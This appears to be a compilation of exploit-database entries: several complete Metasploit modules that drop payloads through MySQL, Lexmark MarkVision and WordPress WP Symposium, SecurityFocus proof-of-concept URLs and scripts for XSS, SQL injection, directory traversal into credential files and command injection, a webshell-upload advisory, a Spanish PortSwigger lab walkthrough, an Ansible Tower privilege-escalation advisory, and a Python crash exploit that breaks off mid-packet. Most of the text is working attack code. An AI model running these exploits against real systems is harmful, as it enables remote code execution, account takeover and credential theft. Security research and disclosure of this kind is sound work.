200[OK] GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[142] Date[Sa., 10 Jan. 2015 12:49:30 GMT] Reference(s): http://localhost:8888/ http://localhost:8888/%3C/./ 1.2 The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: URL http://localhost:8888/./webshell.png.html.php PoC: Index of Documents <tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td> <td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td> <td align="center"><span class="s">538 B</span></td></tr> --- PoC Session Logs [POST] --- 14:03:16.481[149ms][total 1583ms] Status: 200[OK] POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------282243582256 Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png" Content-Type: image/png Reference(s): http://localhost:8888/ http://localhost:8888/./webshell.png.html.php Solution - Fix & Patch: ======================= 1.1 The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request. Restrict the filename input and filter with an own set exception to prevent application-side attacks. Parse also in the Index of Documents the vulnerable name output value to solve the issue. 1.2 Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions. Restrict the upload folder and disallow the execution of files that are already uploaded. Security Risk: ============== 1.1 The security risk of the local file include web vulnerability in the upload POSt method request is estimated as high. (CVSS 6.9) 1.2 The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

## # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse', 'Description' => %q{ This module takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers. This module abuses the FILE privilege to write a payload to Microsoft's All Users Start Up directory which will execute every time a user logs in. The default All Users Start Up directory used by the module is Windows 7 friendly. }, 'Author' => [ 'sinn3r', 'Sean Verity <veritysr1980[at]gmail.com' ], 'DefaultOptions' => { 'DisablePayloadHandler' => 'true' }, 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2012-5613'], #DISPUTED ['OSVDB', '88118'], ['EDB', '23083'], ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13'] ], 'Platform' => 'win', 'Targets' => [ [ 'MySQL on Windows', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 01 2012' )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as']), OptString.new('PASSWORD', [ true, 'The password to authenticate with']), OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/']) ]) end def check m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return Exploit::CheckCode::Safe unless m return Exploit::CheckCode::Appears if is_windows? Exploit::CheckCode::Safe end def peer "#{rhost}:#{rport}" end def query(q) rows = [] begin res = mysql_query(q) return rows unless res res.each_hash do |row| rows << row end rescue RbMysql::ParseError return rows end rows end def is_windows? r = query("SELECT @@version_compile_os;") r[0]['@@version_compile_os'] =~ /^Win/ ? true : false end def get_drive_letter r = query("SELECT @@tmpdir;") drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || '' drive end def upload_file(bin, dest) p = bin.unpack("H*")[0] query("SELECT 0x#{p} into DUMPFILE '#{dest}'") end def exploit unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/') fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError fail_with(Failure::NoAccess, "#{peer} - Access denied") end fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m unless is_windows? fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows") end begin drive = get_drive_letter rescue RbMysql::ParseError fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") end fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe = generate_payload_exe print_status("#{peer} - Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)") end register_file_for_cleanup("#{dest}") end end

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1. A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated attacker to upload arbitrary files, including arbitrary JSP code. This module has been tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2. }, 'Author' => [ 'Andrea Micalizzi', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8741'], ['ZDI', '14-410'], ['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US'] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Lexmark Markvision Enterprise 2.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 09 2014')) register_options( [ Opt::RPORT(9788), OptString.new('TARGETURI', [true, 'ROOT path', '/']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html') }) version = nil if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/ version = $1 else return Exploit::CheckCode::Unknown end if Gem::Version.new(version) <= Gem::Version.new('2.0.0') return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def exploit jsp_leak = jsp_path jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp" # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") if upload_file(traversal_leak, jsp_leak) print_good("#{peer} - JSP successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end res = execute(jsp_name_leak) if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ upload_path = $1 print_good("#{peer} - Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) else print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") end jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_payload = payload.encoded traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") if upload_file(traversal_payload, jsp_payload) print_good("#{peer} - JSP successfully uploaded") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end print_status("#{peer} - Executing payload...") execute(jsp_payload_name, 3) end def upload_file(filename, contents) good_signature = rand_text_alpha(4 + rand(4)) bad_signature = rand_text_alpha(4 + rand(4)) post_data = Rex::MIME::Message.new post_data.add_part(good_signature, nil, nil, 'form-data; name="success"') post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"') post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'), 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature) return true else return false end end def execute(jsp_name, time_out = 20) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, jsp_name), 'method' => 'GET' }, time_out) res end def jsp_path jsp =<<-EOS <%@ page language="Java" import="java.util.*"%> <% out.println("Path:" + System.getProperty("catalina.home")); %> EOS jsp end end

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress WP Symposium 14.11 Shell Upload', 'Description' => %q{WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /wp-symposium/server/file_upload_form.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server.}, 'License' => MSF_LICENSE, 'Author' => [ 'Claudio Viviani', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['OSVDB', '116046'], ['WPVDB', '7716'] ], 'DisclosureDate' => 'Dec 11 2014', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['wp-symposium < 14.12', {}]], 'DefaultTarget' => 0 )) end def check check_plugin_version_from_readme('wp-symposium', '14.12') end def generate_mime_message(payload, payload_name, directory_name, symposium_url) data = Rex::MIME::Message.new data.add_part('1', nil, nil, 'form-data; name="uploader_uid"') data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"') data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"') data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"") data end def exploit print_status("#{peer} - Preparing payload") unique_name = Rex::Text.rand_text_alpha(10) payload_name = "#{unique_name}.php" symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') payload_url = normalize_uri(symposium_url, unique_name, payload_name) data = generate_mime_message(payload, payload_name, unique_name, symposium_url) symposium_url = normalize_uri(symposium_url, 'index.php') print_status("#{peer} - Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => symposium_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' print_good("#{peer} - Uploaded the payload") register_files_for_cleanup(payload_name) print_status("#{peer} - Executing the payload...") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) print_good("#{peer} - Executed payload") else if res.nil? fail_with(Failure::Unreachable, "No response from the target") else vprint_error("#{peer} - HTTP Status: #{res.code}") vprint_error("#{peer} - Server returned: #{res.body}") fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end end end

source: https://www.securityfocus.com/bid/47903/info Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This issue is being tracked by Cisco Bug ID CSCto12712. Cisco Unified Operations Manager versions prior to 8.6 are vulnerable. http://www.example.com/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)

source: https://www.securityfocus.com/bid/47902/info CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks. This issue is being monitored by Cisco Bug ID CSCto12704. CiscoWorks Common Services 3.3 and prior are vulnerable. http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Web shell upload via Content-Type restriction bypass”. Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo. Además, el servidor está configurado para prevenir la subida de archivos según el Content-Type. Por lo que tendremos que bypasear esta defensa. En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo: Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta: Como podemos ver, tenemos una opción para subir archivo, y concretamente parece ser que se trata de actualizar el avatar del perfil. Vamos a intentar aprovecharnos de esta opción para subir el siguiente archivo PHP: Antes que nada, vamos a preparar Burp Suite para que intercepte la petición: Una vez tenemos Burp Suite listo junto al proxy, seleccionamos el archivo y le damos a “Upload”: Aquí Burp Suite interceptará la petición de subida del archivo: Vamos a mandar la petición al repeater para tratar con ella mejor, para ello, pulsamos Ctrl R. Una vez en el repeater, cuando le damos a “Send”, podemos ver la respuesta a la subida del archivo por parte del servidor: En este caso, indica que los archivos cuya cabecera Content-Type sea application/x-php no están permitidos. Y que solo están permitidos los que sea image/jpeg o image/png. Sabiendo el tipo de restricción que nos está implantando el servidor, simplemente podemos cambiar el Content-Type de nuestra petición: Con esto, el contenido del archivo no cambia, y tampoco afectará a que se interprete. Con este cambio, volvemos a intentar la subida del archivo: Esta vez vemos que se ha subido correctamente. Podemos ver esta respuesta en el navegador de la siguiente forma: Una vez llegados aquí, ya podemos desactivar el Burp Suite, ya que no haremos más uso de él. Con esto, volvemos a nuestro perfil. Ahora, si nos fijamos en el perfil, podemos ver como el avatar ha cambiado, y ahora muestra un fallo de que no carga bien la imagen: Dándole click derecho, podemos irnos a la ruta directa de la imagen para ver si se trata de nuestro archivo PHP: Efectivamente, el archivo PHP que hemos subido se ha almacenado como el archivo del avatar, por eso no cargaba en el perfil, intentaba cargar una imagen cuando no lo era. Al visitar el archivo PHP, se ha interpretado el código que hemos colocado, y conseguimos leer el archivo secret. Habiendo leído este archivo, ya simplemente entregamos la respuesta: Y de esta forma, completamos el laboratorio:

source: https://www.securityfocus.com/bid/47914/info Room Juice is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Room Juice 0.3.3 is vulnerable; other versions may also be affected. http://www.example.com/roomjuice-0.3.3/display.php?filename=%3Cscript%3Ealert%280%29%3C/script%3E

source: https://www.securityfocus.com/bid/47905/info CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer. This issue is being monitored by Cisco Bug ID CSCto35577. CiscoWorks Common Services 3.3 and prior are vulnerable. http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini cmfDBA user database info: http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases: http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example. DB password change log: http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\log\dbpwdChange.log

source: https://www.securityfocus.com/bid/47918/info Andy's PHP Knowledgebase is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process. Andy's PHP Knowledgebase 0.95.4 is vulnerable; other versions may also be affected. <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/aphpkb/install/step5.php"> <input type="hidden" name="install_dbuser" value="');system('calc');//" /> <input type="submit" name="submit" /> </form> </body> </html>

source: https://www.securityfocus.com/bid/47919/info Zend Framework is prone to a security-bypass vulnerability. An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities. Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable. $dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK'; $pdo = new PDO($dsn, $user, $pass); $pdo->exec('SET NAMES GBK'); $string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*'; $sql = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ".$pdo->quote($string).";"; $stmt = $pdo->query($sql); var_dump($stmt->rowCount());

source: https://www.securityfocus.com/bid/47924/info klibc is prone to a shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary shell commands in the context of the application that uses the vulnerable library. Versions prior to klibc 1.5.22 are vulnerable. DNSDOMAIN="\\\"\$(echo owned; touch /tmp/owned)"

SEC Consult Vulnerability Lab Security Advisory < 20150113-1 > ======================================================================= title: Privilege Escalation & XSS & Missing Authentication product: Ansible Tower vulnerable version: <=2.0.2 fixed version: >=2.0.5 impact: high homepage: http://www.ansible.com/tower found: 2014-10-15 by: Manuel Hofer SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Ansible Tower is the easy-to-use UI and dashboard and REST API for Ansible. Centralize your Ansible infrastructure from a modern UI, featuring role-based access control, job scheduling, and graphical inventory management. Tower's REST API and CLI make it easy to embed Tower into existing tools and processes. Tower now includes real-time output of playbook runs, an all-new dashboard and expanded out-of-the-box cloud support." source: http://www.ansible.com/tower Business recommendation: ------------------------ Attackers are able to elevate privileges and gain full control over Ansible Tower and therefore access to sensitive data of other customers. It is assumed that further vulnerabilities exist as only a short crash test has been performed. Therefore it is recommended to perform a thorough security review by security professionals. Vulnerability overview/description: ----------------------------------- 1) Privilege Escalation Ansible Tower provides the feature to create multiple organizations inside one tower instance. Each organization can have an unlimited number of users and administrators which are only allowed to perform actions in the context of their own organization. Due to missing validation of the "is_superuser" parameter during user creation, organization admins can create superadmin accounts and therefore elevate their privileges to gain full control of Ansible Tower. 2) Reflected Cross-Site Scripting Several parts of the Ansible Tower API have been identified to be vulnerable against reflected XSS attacks which can be used by an attacker to steal user sessions. 3) Missing Websocket Authentication / Information Leakage The Ansible Tower UI uses Websockets to notify clients about recent events. This part of the application lacks authentication as well as authorization, leading to internal data about e.g. scheduled events, being leaked to unauthorized and/or unauthenticated users. Proof of concept: ----------------- 1) Privilege Escalation (Org-Admin to Superadmin) Using the following request, a user with administrative privileges limited to an organization, can create a superadmin account with access to all organizations: > POST /api/v1/organizations/3/users/ HTTP/1.1 > Host: $host > Authorization: Token c3f03841403a17ed79753e057167a62144dae7df > X-Auth-Token: Token c3f03841403a17ed79753e057167a62144dae7df > > {"first_name":"Org1admin_superuser","last_name":"Org1admin_superuser", > "email":"Org1admin_superuser@local.local","organization":3, > "username":"Org1admin_superuser","password":"Org1admin_superuser", > "password_confirm":"Org1admin_superuser","is_superuser":"true","ldap_user":""} 2) Reflected Cross-Site Scripting The following URL parameters have been identified to be vulnerable against reflected cross-site scripting: * URL: /api/v1/credentials/, Parameter: order_by * URL: /api/v1/inventories/, Parameter: order_by * URL: /api/v1/projects/, Parameter: order_by * URL: /api/v1/schedules/, Parameter: next_run * URL: /api/v1/users/3/permissions/, Parameter: order_by It is likely that similar issues exist in other parts of the application. 3) Missing Websocket Authentication / Information Leakage An attacker can setup a websocket connection without providing any credentials as follows. By issuing a GET request to "https://tower:8080/socket.io/1/" the server responds with the following string: > 43167469538:60:60:websocket,xhr-multipart,htmlfilonp-polling[...] The first integer value can further be used to establish a websocket connection: #~% openssl s_client -verify 0 -connect tower:8080 > GET /socket.io/1/websocket/43167469538 HTTP/1.1 > Host: tower:8080 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-US,en;q=0.5 > Accept-Encoding: gzip, deflate > Sec-WebSocket-Version: 13 > Origin: https://tower > Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== > Connection: keep-alive, Upgrade > Pragma: no-cache > Cache-Control: no-cache > Upgrade: websocket > > The websocket key seen above, has been taken from the examples of the wikipedia page on WebSockets (http://de.wikipedia.org/wiki/WebSocket) as it is only used to verify that the server received and understood the message. The server responds as follows: < HTTP/1.1 101 Switching Protocols < Upgrade: websocket < Connection: Upgrade < Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo= Now that the websocket connection has been established, data that would otherwise be presented to logged in users to display status updates for "job related events" inside tower, can now be observed without any authentication. Following an example of data received through the websocket connection. > 5::/socket.io/jobs:{"args":{"status":"pending","project_id":56, > "unified_job_id":61,"event":"status_changed","endpoint":"/socket.io/jobs"}, > "name":"status_changed"} Even tough no critical information has been identified leaking through the websocket, this should still be protected with proper authentication and authorization because it might aid an attacker in conducting further attacks. Vulnerable / tested versions: ----------------------------- Ansible Tower version v2.0.2 has been tested which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-10-22: Contacting vendor through security@ansible.com and asking for cryptographic material in order to securely send advisory. 2014-10-22: Sending unencrypted advisory as requested by vendor. 2014-10-22: Vendor suggests to release a fix prior to 12.12.2014 2014-10-28: Vendor confirms reported vulnerabilities 2014-12-10: Vendor releases fixed Version 2.0.5 2015-01-13: SEC Consult releases security advisory Solution: --------- Upgrade to a fixed version of Ansible Tower >= 2.0.5 Workaround: ----------- For vulnerabilities 1 to 2, no workaround can be applied. 3 can be circumvented by blocking access to TCP port 8080 on your Ansible Tower installation. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF Manuel Hofer / 2015

source: https://www.securityfocus.com/bid/47931/info LimeSurvey is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. LimeSurvey 1.85+ is vulnerable; other versions may also be affected. POST /admin/admin.php HTTP/1.1 Content-Length: 110 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.mspowerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://xxx.xxx.xxx.xxx/admin/admin.php Accept-Language: es-AR Content-Type: application/x-www-form-urlencoded Host: xxx.xxx.xxx.xxx Pragma: no-cache Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) user=admin&password=test&loginlang=default&action=login&refererargs="/><script >alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/47951/info phpScheduleIt is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. phpScheduleIt 1.2.12 is vulnerable; other versions may also be affected. http://www.example.com/forgot_pwd.php/[xss] http://www.example.com/index.php/[xss] http://www.example.com/register.php/[xss] http://www.example.com/roschedule.php/[xss] http://www.example.com/popCalendar.php?scheduleid=[xss]

source: https://www.securityfocus.com/bid/47941/info The 'com_maplocator' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_maplocator&view=state&cid= null+AND+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

source: https://www.securityfocus.com/bid/47952/info Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability. An attacker can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, remote code execution is possible but has not been confirmed. Lumension Device Control 4.4 SR6 is vulnerable; other versions may also be affected. #!/usr/local/bin/python import sys from socket import * import os if (len(sys.argv)!=2): print "\n--------------------------------------------------" print "Usage: %s <target IP>" % sys.argv[0] print "--------------------------------------------------\n" exit(0) host=sys.argv[1] port=65129 packet1 = "\xec\x02\x00\x00" #length of remaining packet packet1 += "\xc9\x00\x00\x00" #some kind of packet ID? #packet1 += "\x18\x00\x00\x00" packet1 += "\x61\x61\x61\x61" #crash occurs here packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3" packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00" packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde" packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01" packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00" packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e" packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99" packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00" packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3" packet1 += 